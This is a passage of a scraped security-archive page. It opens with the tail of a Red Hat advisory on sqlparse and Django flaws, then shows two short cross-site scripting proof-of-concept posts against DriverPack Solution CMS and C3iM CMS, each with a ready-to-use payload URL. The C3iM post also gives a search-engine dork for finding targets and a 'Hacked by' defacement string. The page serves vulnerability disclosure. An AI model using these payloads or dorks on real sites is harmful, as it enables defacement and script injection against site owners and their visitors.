2187903 - CVE-2023-30608 sqlparse: Parser contains a regular expression that is vulnerable to ReDOS (Regular Expression Denial of Service)  
2192565 - CVE-2023-31047 python-django: Potential bypass of validation when uploading multiple files using one form field

6. JIRA issues fixed (https://issues.redhat.com/):

RHUI-217 - [RFE] Client rpms created in RHUI don't prevent auto-enable of subscription manager plugins  
RHUI-263 - [RFE] Bug 2079391 - Feature request to provide sync/repo status of each repo in a JSON file for automated monitoring  
RHUI-356 - "logname: no login name" appears, twice, in e-mails sent by the rhui-repo-sync cron job  
RHUI-395 - Change error reporting of rhui-manager to be configurable  
RHUI-424 - repo deletion for an un-added repo results in a traceback  
RHUI-430 - Installation fails on RHEL 8.9  
RHUI-75 - repo sync for an un-added repo results in a traceback

7. Package List:

RHUI 4 for RHEL 8:

Source:  
python-django-3.2.19-1.0.1.el8ui.src.rpm  
python-sqlparse-0.4.4-1.0.1.el8ui.src.rpm  
rhui-installer-4.5.0.1-1.el8ui.src.rpm  
rhui-tools-4.5.0.5-1.el8ui.src.rpm

noarch:  
python39-django-3.2.19-1.0.1.el8ui.noarch.rpm  
python39-sqlparse-0.4.4-1.0.1.el8ui.noarch.rpm  
rhui-installer-4.5.0.1-1.el8ui.noarch.rpm  
rhui-tools-4.5.0.5-1.el8ui.noarch.rpm  
rhui-tools-libs-4.5.0.5-1.el8ui.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2023-30608  
https://access.redhat.com/security/cve/CVE-2023-31047  
https://access.redhat.com/security/updates/classification/#moderate

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0/U2AAoJENzjgjWX9erEb/8P/jYIo/4EGwCzZUR1npbmdew7  
5p4Lb3Nun23gnBGKDLrbbQqQjyjNbzbzlmjxVAfYnNTNqDHurCZ8SCsLitXR7CN6  
fQrMMCN7xAXjfTLNHl/w9QANqKGkfRa9pf5rRSvufgrh9XSvzlzPpzuihtUsBRjH  
MFEtA3QOiuvyJKXzqWTdWqt0NPCycSfJnm5MhI94C8UeVlFAdm0yEYMDfhV6iRFE  
RJx/LITiaks4FQ1RxAumkqoUrmfk+jsim0a5unfq+5hWubBFAvDo6VXpMPL20pcZ  
MJyVkay6aQQg7dmCzXyXW8kGy/ZwYfjCML1qabh6aLW4dTz5saj6G8UbZiMeKfrh  
SPTEMJbJU0pH7UIGgB2/v2xffsdmTkxgCY0xu75eokcWa4PSRE3UsZ7HRy5aAJRk  
uEWizCXHjQw9HkPnlTcOaQKLS3Fv9qG2tn6XWxmHlo2VrL88rDlmylyL/1euFDHQ  
ihaDj5AuHNWrZgBgghKPr89BkO6AiPAoYvg2Ld2bxXtMUohTVdxM00EVTmZImR1M  
N0NxrpFqQJPFfiN2MFmdl90pzLvwLYcMM7TTyBGxb6J9bSuP2/gEHsDBth7+m17n  
dmwym0w5xv9Z+yMF9KgdcDffBXnzkFdv/tSSh6sFzqpFGtMvKfyGbFAzkx3SG9MG  
SXC8b0Et+9GnN9s7cg/K  
=UP7R  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4591-01

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | e6bbd0f2f85c5a85db0341ad4fa0a655765bd7b91a5cc41a6d0b07469ab56025

Download | Favorite | View

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DriverPack Solution CMS v 17.11.108 Xss Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://driverpack.io/                                                                                             |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use xss payload : _%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb[+] http://target_site/en?email=_%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zebGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

DriverPack Solution CMS 17.11.108 Cross Site Scripting

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ee75f970e155669b73118332fbaa7e9c33f33900005bfc151805b9ba771cd102

Download | Favorite | View

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Desenvolvido C3iM CMS v2.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://c3im.pt/                                                                                                    |  | # Dork      : intext:''Desenvolvido C3iM'' site:pt                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/conteudo.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

Tag

#mac